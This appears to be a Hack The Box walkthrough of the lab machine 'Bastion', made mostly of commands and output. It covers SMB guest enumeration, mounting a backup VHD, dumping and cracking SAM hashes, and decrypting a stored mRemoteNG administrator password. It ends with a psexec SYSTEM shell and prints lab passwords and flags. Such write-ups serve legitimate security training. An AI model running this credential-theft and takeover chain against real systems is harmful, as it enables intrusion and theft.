Bastion
Sun, 29 September 2024
Platform: Hack The Box
sudo nmap 10.10.10.134 -sV -Pn -r -g53 -D 1.1.1.1 -p- --min-rate=3000 -sC
Nmap scan report for 10.10.10.134
Host is up (0.035s latency).
Not shown: 65522 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
| 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
| 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Bastion
| NetBIOS computer name: BASTION\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2024-09-27T22:44:36+02:00
|_clock-skew: mean: -39m58s, deviation: 1h09m13s, median: -1s
| smb2-time:
| date: 2024-09-27T20:44:32
|_ start_date: 2024-09-27T20:39:59
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.56 seconds
crackmapexec smb 10.10.10.134 -u 'guest' -p '' --shares
SMB 10.10.10.134 445 BASTION [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB 10.10.10.134 445 BASTION [+] Bastion\guest:
SMB 10.10.10.134 445 BASTION [+] Enumerated shares
SMB 10.10.10.134 445 BASTION Share Permissions Remark
SMB 10.10.10.134 445 BASTION ----- ----------- ------
SMB 10.10.10.134 445 BASTION ADMIN$ Remote Admin
SMB 10.10.10.134 445 BASTION Backups READ
SMB 10.10.10.134 445 BASTION C$ Default share
SMB 10.10.10.134 445 BASTION IPC$ Remote IPC
impacket-smbclient guest@10.10.10.134
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
Type help for list of commands
# shares
ADMIN$
Backups
C$
IPC$
# use Backups
# tree
/note.txt
/SDT65CB.tmp
/WindowsImageBackup/L4mpje-PC
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
/WindowsImageBackup/L4mpje-PC/Catalog
/WindowsImageBackup/L4mpje-PC/MediaId
/WindowsImageBackup/L4mpje-PC/SPPMetadataCache
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/BackupSpecs.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
/WindowsImageBackup/L4mpje-PC/Catalog/BackupGlobalCatalog
/WindowsImageBackup/L4mpje-PC/Catalog/GlobalCatalog
/WindowsImageBackup/L4mpje-PC/SPPMetadataCache/{cd113385-65ff-4ea2-8ced-5630f6feca8f}
Finished - 23 files and folders
cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
sudo mount //10.10.10.134/Backups /mnt/smb/
cd /mnt/smb
tree
.
├── JAMXFGROWQ
├── SDT65CB.tmp
├── WindowsImageBackup
│ └── L4mpje-PC
│ ├── Backup 2019-02-22 124351
│ │ ├── 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
│ │ ├── 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
│ │ ├── BackupSpecs.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
│ │ ├── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
│ │ └── cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
│ ├── Catalog
│ │ ├── BackupGlobalCatalog
│ │ └── GlobalCatalog
│ ├── MediaId
│ └── SPPMetadataCache
│ └── {cd113385-65ff-4ea2-8ced-5630f6feca8f}
└── note.txt
sudo qemu-nbd --connect /dev/nbd0 \
/mnt/smb/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
sudo mount /dev/nbd0p1 /mnt/vhd
cd /mnt/vhd
ls
'$Recycle.Bin' PerfLogs ProgramData 'System Volume Information' Windows config.sys
'Documents and Settings' 'Program Files' Recovery Users autoexec.bat pagefile.sys
grep -rw 'SAM' Windows
Windows/Panther/cbs.log:2019-02-22 13:37:04, Info CBS Loading offline registry hive: SAM, into registry
key '{bf1a281b-ad7b-4476-ac95-f47682990ce7}E:/Windows/System32/config/SAM' from path '\\?\E:\Windows\System32\config\SAM'.
Windows/Panther/cbs.log:2019-02-22 13:37:04, Info CBS Unloading offline registry hive: {bf1a281b-ad7b-$
476-ac95-f47682990ce7}E:/Windows/System32/config/SAM
Windows/Panther/cbs.log:2019-02-22 13:37:04, Info CBS Failed to unload offline registry: {bf1a281b-ad7b
-4476-ac95-f47682990ce7}E:/Windows/System32/config/SAM, the client may still need it open. [HRESULT = 0x80070005 - E_ACCESS
DENIED]
grep -rw 'SYSTEM' Windows
Windows/Panther/cbs.log:2019-02-22 13:37:04, Info CBS Loading offline registry hive: SYSTEM, into regis
try key '{bf1a281b-ad7b-4476-ac95-f47682990ce7}E:/Windows/System32/config/SYSTEM' from path '\\?\E:\Windows\System32\config
\SYSTEM'.
Windows/Panther/cbs.log:2019-02-22 13:37:04, Info CBS Unloading offline registry hive: {bf1a281b-ad7b-4
476-ac95-f47682990ce7}E:/Windows/System32/config/SYSTEM
Windows/Panther/cbs.log:2019-02-22 13:37:04, Info CBS Failed to unload offline registry: {bf1a281b-ad7b
-4476-ac95-f47682990ce7}E:/Windows/System32/config/SYSTEM, the client may still need it open. [HRESULT = 0x80070005 - E_ACC
ESSDENIED]
impacket-secretsdump LOCAL -sam Windows/System32/config/SAM -system Windows/System32/config/SYSTEM
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...
echo 'Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::' > hashes
john hashes -w=rockyou --format='NT'
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
(Administrator)
bureaulampje (L4mpje)
2g 0:00:00:00 DONE (2024-09-28 00:44) 5.405g/s 25392Kp/s 25392Kc/s 25406KC/s burgerd..burdoux
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed.
l4mpje:bureaulampje
ssh l4mpje@10.10.10.134
l4mpje@10.10.10.134's password:
Microsoft Windows [Version 10.0.14393]
c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users>tree /F
Folder PATH listing
Volume serial number is 00000055 1B7D:E692
C:.
├───Administrator
├───L4mpje
│ ├───Contacts
│ ├───Desktop
│ │ user.txt
│ │
│ ├───Documents
│ ├───Downloads
│ ├───Favorites
│ │ │ Bing.url
│ │ │
│ │ └───Links
│ ├───Links
│ │ Desktop.lnk
│ │ Downloads.lnk
│ │
│ ├───Music
│ ├───Pictures
│ ├───Saved Games
│ ├───Searches
│ └───Videos
└───Public
├───Documents
├───Downloads
├───Music
├───Pictures
└───Videos
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
c349597e3f979e6ecb25ab6795e2fe0b
l4mpje@BASTION C:\Users>tree %appdata% /f
Folder PATH listing
Volume serial number is 1B7D-E692
C:\USERS\L4MPJE\APPDATA\ROAMING
├───Adobe
│ └───Flash Player
│ └───NativeCache
└───mRemoteNG
│ confCons.xml
│ confCons.xml.20190222-1402277353.backup
│ confCons.xml.20190222-1402339071.backup
│ confCons.xml.20190222-1402379227.backup
│ confCons.xml.20190222-1403070644.backup
│ confCons.xml.20190222-1403100488.backup
│ confCons.xml.20190222-1403220026.backup
│ confCons.xml.20190222-1403261268.backup
│ confCons.xml.20190222-1403272831.backup
│ confCons.xml.20190222-1403433299.backup
│ confCons.xml.20190222-1403486580.backup
│ extApps.xml
│ mRemoteNG.log
│ pnlLayout.xml
│
└───Themes
darcula.vstheme
vs2015blue.vstheme
vs2015dark.vstheme
vs2015light.vstheme
findstr /si "passw" *
confCons.xml: <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a
4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAow
VRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" ...
aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAow
VRdC7emf7lWWA10dQKiw==
python3 mremoteng_decrypt.py -s aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==
Password: thXLHM96BeKL0ER2
Administrator:thXLHM96BeKL0ER2
impacket-psexec 'Administrator'@10.10.10.134 cmd.exe
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
Password:
[*] Requesting shares on 10.10.10.134.....
[*] Found writable share ADMIN$
[*] Uploading file wjtrUkFl.exe
[*] Opening SVCManager on 10.10.10.134.....
[*] Creating service GMyk on 10.10.10.134.....
[*] Starting service GMyk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32> type c:\users\administrator\desktop\root.txt
58f0e7962cab06b509f7421f76d87060